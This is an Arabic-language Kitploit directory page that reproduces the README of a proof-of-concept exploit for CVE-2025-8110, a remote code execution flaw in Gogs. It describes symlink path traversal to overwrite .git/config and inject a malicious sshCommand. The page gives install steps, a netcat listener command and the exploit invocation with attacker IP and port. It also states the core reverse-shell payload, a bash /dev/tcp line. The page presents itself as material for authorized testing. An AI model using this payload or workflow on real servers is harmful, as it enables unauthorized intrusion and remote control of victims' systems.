Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-8110 — إثبات مفهوم لاستغلال CVE-2025-8110، ثغرة تنفيذ أكواد عن بُعد (RCE) في Gogs تستغل اجتياز المسار عبر الروابط الرمزية وحقن sshCommand لتسليم قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/ghxstsec/cve-2025-8110
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubghxstsec/cve-2025-8110

CVE-2025-8110

إثبات مفهوم لاستغلال CVE-2025-8110، ثغرة تنفيذ أكواد عن بُعد (RCE) في Gogs تستغل اجتياز المسار عبر الروابط الرمزية وحقن sshCommand لتسليم قشرة عكسية.

عرض المستودع
53منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال Gogs RCE (CVE-2025-8110)

Python License Expertise

إثبات مفهوم (PoC) لثغرة CVE-2025-8110، وهي ثغرة حرجة في Gogs تسمح بتنفيذ التعليمات البرمجية عن بُعد (RCE) عبر التلاعب بملف .git/config باستخدام تجاوزات الروابط الرمزية وحقن sshCommand.

📖 نظرة عامة

يستهدف هذا الاستغلال ثغرة تجاوز المسار (Path Traversal) في إدارة محتوى واجهة برمجة تطبيقات Gogs. يمكن للمستخدم المُصادَق أن:

  1. ينشئ مستودعًا ويدفع رابطًا رمزيًا يشير إلى ملف .git/config الداخلي.
  2. يستخدم الواجهة البرمجية للكتابة فوق ملف الإعدادات المستهدف عبر الرابط الرمزي.
  3. يحقن sshCommand خبيثًا لتنفيذ قشرة عكسية (Reverse Shell) عندما ينفذ الخادم عمليات Git.

🚀 الميزات

  • سير عمل آلي: يتولى تسجيل الدخول وإنشاء المستودع ونشر الرابط الرمزي وتسميمه.
  • ترميز قوي: يرمّز بيانات الاعتماد تلقائيًا بتشفير URL للتعامل مع الأحرف الخاصة (مثل !, @).
  • مخرجات غنية: تسجيل عالي الوضوح باستخدام مكتبة Rich.

🛠 المتطلبات الأساسية

  • Python 3.12+
  • Git مثبت على النظام المحلي.
  • بيانات اعتماد صالحة على مثيل Gogs المستهدف.

📦 التثبيت

  1. استنسخ المستودع:
    root@kitploit:~
    git clone https://github.com/Ghxstsec/CVE-2025-8110.git
    cd CVE-2025-8110
    

ثبّت التبعيات:

root@kitploit:~
pip3 install -r requirements.txt

💻 الاستخدام

شغّل المستمع الخاص بك:

root@kitploit:~
nc -lvnp 6666

شغّل الاستغلال:

root@kitploit:~
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'

الوسائط:

جوهر الثغرة:

sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #

عندما ينفذ Gogs أمر Git يتطلب نقلًا عبر الشبكة (مثل مزامنة مرآة أو فحص مرجع داخلي)، فإنه يستدعي sshCommand، مما يؤدي إلى تفعيل القشرة العكسية.

⚠️ إخلاء مسؤولية قانوني: هذه الأداة مخصصة للأغراض التعليمية واختبارات الأمان المصرح بها فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج النصي. الوصول غير المصرح به إلى أنظمة الكمبيوتر يعد غير قانوني.

تنزيل الأداة
الوسيطةالوصف
-u, --urlعنوان URL الأساسي لمثيل Gogs المستهدف (مثل: http://target.htb:3000).
-lh, --hostعنوان IP للمهاجم (LHOST) الذي ستتصل به القشرة العكسية.
-lp, --portمنفذ المستمع (LPORT) المُعد على جهازك.
-p, --passwordكلمة المرور لحساب pwnuser لإجراء المصادقة.
-x, --proxy(اختياري) يمرر حركة المرور عبر وكيل محلي (الافتراضي: http://localhost:8080).